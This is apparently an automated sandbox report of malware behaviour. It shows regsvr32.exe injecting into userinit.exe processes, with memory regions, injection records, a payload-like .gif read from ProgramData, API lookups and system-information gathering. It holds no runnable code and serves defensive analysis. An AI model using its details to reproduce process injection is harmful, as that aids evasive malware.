Information	Value
PID	0xf48
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F4C 0x F64 0x F68

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
private_0x00000000000f0000	0x000f0000	0x0012ffff	Private Memory	rw	-
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00140000	0x00140fff	Memory Mapped File	r	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	rwx	-
private_0x0000000000160000	0x00160000	0x0016ffff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x001c0000	0x001c0fff	Memory Mapped File	r	-
private_0x00000000001e0000	0x001e0000	0x002dffff	Private Memory	rw	-
pagefile_0x00000000002e0000	0x002e0000	0x003a7fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
pagefile_0x0000000000680000	0x00680000	0x0075efff	Pagefile Backed Memory	r	-
private_0x0000000000770000	0x00770000	0x0077ffff	Private Memory	rw	-
private_0x0000000000780000	0x00780000	0x0089ffff	Private Memory	rw	-
private_0x0000000000780000	0x00780000	0x0082ffff	Private Memory	rw	-
private_0x0000000000860000	0x00860000	0x0089ffff	Private Memory	rw	-
pagefile_0x00000000008a0000	0x008a0000	0x00c92fff	Pagefile Backed Memory	r	-
private_0x0000000000ca0000	0x00ca0000	0x00d1ffff	Private Memory	rw	-
private_0x0000000000d20000	0x00d20000	0x00e2cfff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00eb0fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00eb4fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00eb8fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ebcfff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ec0fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ec4fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ec8fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00eccfff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ed0fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ed4fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ed8fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00edcfff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ee0fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ee4fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00ee8fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00eecfff	Private Memory	rw	-
userinit.exe	0x00ef0000	0x00ef8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000f00000	0x00f00000	0x01afffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01b00000	0x0242ffff	Memory Mapped File	r	-
private_0x0000000002430000	0x02430000	0x0252ffff	Private Memory	rw	-
private_0x0000000002530000	0x02530000	0x0272ffff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027b2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027b6fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027bafff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027befff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c6fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027cafff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027cefff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027d2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027d6fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027dafff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027defff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e6fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027eafff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027eefff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f4fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f8fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027fcfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02802fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02806fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0280afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0280efff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02814fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02818fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0281cfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02822fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02826fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282efff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02834fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02838fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0283cfff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028b0fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028c6fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028cafff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028cefff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028e4fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028e8fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028ecfff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028f0fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02906fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0290afff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0290efff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02924fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02928fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0292cfff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02930fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02946fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0294afff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0294ffff	Private Memory	-	-
private_0x00000000028c0000	0x028c0000	0x02982fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029a0fff	Private Memory	rw	-
private_0x0000000002900000	0x02900000	0x029e2fff	Private Memory	rw	-
private_0x0000000002910000	0x02910000	0x02a00fff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a42fff	Private Memory	rw	-
private_0x0000000002950000	0x02950000	0x02a62fff	Private Memory	rwx	-
private_0x0000000002a70000	0x02a70000	0x02b6ffff	Private Memory	-	-
private_0x0000000002bb0000	0x02bb0000	0x02caffff	Private Memory	rw	-
sortdefault.nls	0x02cb0000	0x02f7efff	Memory Mapped File	r	-
olepro32.dll	0x6ceb0000	0x6cec8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6ced0000	0x6cf53fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 18 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffdf008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0xf4c, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (195)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ceb0000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	7	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6ced0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ìî, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cf0266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cf02542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cf01d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cf0238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cf020c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cf01fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cf01e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cf01f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cf01ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cf0216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cf022be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cf021e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ceb20ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ceb20b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ceb20c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ceb20d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsHungAppWindow, address_out = 0x757e7195	1	Fn
Get Address	c:\windows\system32\user32.dll	function = HungWindowFromGhostWindow, address_out = 0x757d61f5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GhostWindowFromHungWindow, address_out = 0x757ba561	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (9)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Create	xx	class_name = TmarxvxinhhmA, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1380322	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551596, new_long = 384	1	Fn
Set Attribute	-	index = 18446744073709551612, new_long = 1380309	1	Fn
Set Attribute	-	index = 18446744073709551596, new_long = 65792	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #29: userinit.exe

232

0

»

Information	Value
ID	#29
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:26, Reason: Child Process
Unmonitor	End Time: 00:01:31, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0xf50
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F54 0x F5C 0x F60

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00217fff	Pagefile Backed Memory	r	-
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	rwx	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	r	-
private_0x0000000000280000	0x00280000	0x0028ffff	Private Memory	rw	-
private_0x0000000000290000	0x00290000	0x0038ffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
private_0x00000000006a0000	0x006a0000	0x006affff	Private Memory	rw	-
private_0x00000000006b0000	0x006b0000	0x008dffff	Private Memory	rw	-
pagefile_0x00000000006b0000	0x006b0000	0x0078efff	Pagefile Backed Memory	r	-
private_0x0000000000790000	0x00790000	0x0080ffff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x00890fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x00894fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x00898fff	Private Memory	rw	-
private_0x0000000000810000	0x00810000	0x0089cfff	Private Memory	rw	-
private_0x0000000000850000	0x00850000	0x0088ffff	Private Memory	rw	-
private_0x00000000008a0000	0x008a0000	0x008dffff	Private Memory	rw	-
private_0x00000000008e0000	0x008e0000	0x00a2ffff	Private Memory	rw	-
private_0x00000000008e0000	0x008e0000	0x009ecfff	Private Memory	rw	-
private_0x00000000009f0000	0x009f0000	0x00a2ffff	Private Memory	rw	-
pagefile_0x0000000000a30000	0x00a30000	0x00e22fff	Pagefile Backed Memory	r	-
private_0x0000000000e30000	0x00e30000	0x00eb2fff	Private Memory	rw	-
private_0x0000000000e30000	0x00e30000	0x00eb6fff	Private Memory	rw	-
